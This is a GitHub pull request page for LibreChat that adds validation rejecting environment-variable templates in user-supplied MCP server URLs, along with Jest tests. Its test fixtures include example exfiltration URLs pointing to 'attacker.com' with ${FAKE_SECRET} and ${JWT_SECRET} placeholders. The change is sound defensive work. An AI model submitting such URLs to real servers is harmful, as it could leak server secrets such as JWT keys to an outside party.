🔏 fix: MCP Server URL Schema Validation#12204
Merged
Merged
Conversation
- Added tests to reject URLs containing environment variable references for SSE, streamable-http, and websocket types in the MCP routes. - Introduced a new schema in the data provider to ensure user input URLs do not resolve environment variables, enhancing security against potential leaks. - Updated existing MCP server user input schema to utilize the new validation logic, ensuring consistent handling of user-supplied URLs across the application.
Contributor
There was a problem hiding this comment.
Pull request overview
This PR tightens MCP server URL handling for user-provided configurations by preventing environment-variable template patterns from being accepted (mitigating potential secret exfiltration), and adds regression tests in both the data-provider and API route layers.
Changes:
- Add a
userUrlSchemainlibrechat-data-providerthat rejects URLs containing${...}patterns and enforces transport protocol constraints without env-var resolution. - Update
MCPServerUserInputSchemato useuserUrlSchemafor WebSocket/SSE/Streamable HTTP transports. - Add Jest tests to ensure MCP routes reject configs whose URLs contain
${...}references.
Reviewed changes
Copilot reviewed 3 out of 3 changed files in this pull request and generated 2 comments.
| File | Description |
|---|---|
| packages/data-provider/src/mcp.ts | Introduces env-var pattern rejection for user URL fields and applies it to the MCP user input schema. |
| packages/data-provider/specs/mcp.spec.ts | Adds unit tests around MCPServerUserInputSchema’s handling of ${...} in URLs. |
| api/server/routes/tests/mcp.spec.js | Adds route-level tests asserting POST/PATCH reject configs with ${...} in MCP URLs. |
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
You can also share your feedback on Copilot code review. Take the survey.
Comment on lines
+237
to
+244
| const userUrlSchema = (protocolCheck: (val: string) => boolean, message: string) => | ||
| z | ||
| .string() | ||
| .refine((val) => !envVarPattern.test(val), { | ||
| message: 'Environment variable references are not allowed in URLs', | ||
| }) | ||
| .pipe(z.string().url()) | ||
| .refine(protocolCheck, { message }); |
Comment on lines
+18
to
+55
| it('should NOT resolve env variables in user-supplied SSE URLs', () => { | ||
| const result = MCPServerUserInputSchema.safeParse({ | ||
| type: 'sse', | ||
| url: 'http://attacker.com/?secret=${FAKE_SECRET}', | ||
| }); | ||
|
|
||
| if (result.success) { | ||
| expect(result.data.url).not.toContain('leaked-secret-value'); | ||
| } else { | ||
| expect(result.success).toBe(false); | ||
| } | ||
| }); | ||
|
|
||
| it('should NOT resolve env variables in user-supplied HTTP URLs', () => { | ||
| const result = MCPServerUserInputSchema.safeParse({ | ||
| type: 'streamable-http', | ||
| url: 'http://attacker.com/?jwt=${JWT_SECRET}', | ||
| }); | ||
|
|
||
| if (result.success) { | ||
| expect(result.data.url).not.toContain('super-secret-jwt'); | ||
| } else { | ||
| expect(result.success).toBe(false); | ||
| } | ||
| }); | ||
|
|
||
| it('should NOT resolve env variables in user-supplied WebSocket URLs', () => { | ||
| const result = MCPServerUserInputSchema.safeParse({ | ||
| type: 'websocket', | ||
| url: 'ws://attacker.com/?secret=${FAKE_SECRET}', | ||
| }); | ||
|
|
||
| if (result.success) { | ||
| expect(result.data.url).not.toContain('leaked-secret-value'); | ||
| } else { | ||
| expect(result.success).toBe(false); | ||
| } | ||
| }); |
- Updated tests to ensure that URLs for SSE, streamable-http, and websocket types containing environment variable patterns are rejected, improving security against potential leaks. - Refactored the MCP server user input schema to enforce stricter validation rules, preventing the resolution of environment variables in user-supplied URLs. - Introduced new test cases for various URL types to validate the rejection logic, ensuring consistent handling across the application.
… handling - Introduced new test cases to validate the prevention of environment variable exfiltration through user input URLs in the MCPServerUserInputSchema. - Updated existing tests to confirm that URLs containing environment variable patterns are correctly resolved or rejected, improving security against potential leaks. - Refactored test structure to better organize environment variable handling scenarios, ensuring comprehensive coverage of edge cases.
danny-avila
changed the title
jcbartle
pushed a commit
to jcbartle/LibreChat
that referenced
this pull request
May 11, 2026
* fix: MCP server configuration validation and schema - Added tests to reject URLs containing environment variable references for SSE, streamable-http, and websocket types in the MCP routes. - Introduced a new schema in the data provider to ensure user input URLs do not resolve environment variables, enhancing security against potential leaks. - Updated existing MCP server user input schema to utilize the new validation logic, ensuring consistent handling of user-supplied URLs across the application. * fix: MCP URL validation to reject env variable references - Updated tests to ensure that URLs for SSE, streamable-http, and websocket types containing environment variable patterns are rejected, improving security against potential leaks. - Refactored the MCP server user input schema to enforce stricter validation rules, preventing the resolution of environment variables in user-supplied URLs. - Introduced new test cases for various URL types to validate the rejection logic, ensuring consistent handling across the application. * test: Enhance MCPServerUserInputSchema tests for environment variable handling - Introduced new test cases to validate the prevention of environment variable exfiltration through user input URLs in the MCPServerUserInputSchema. - Updated existing tests to confirm that URLs containing environment variable patterns are correctly resolved or rejected, improving security against potential leaks. - Refactored test structure to better organize environment variable handling scenarios, ensuring comprehensive coverage of edge cases.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
No description provided.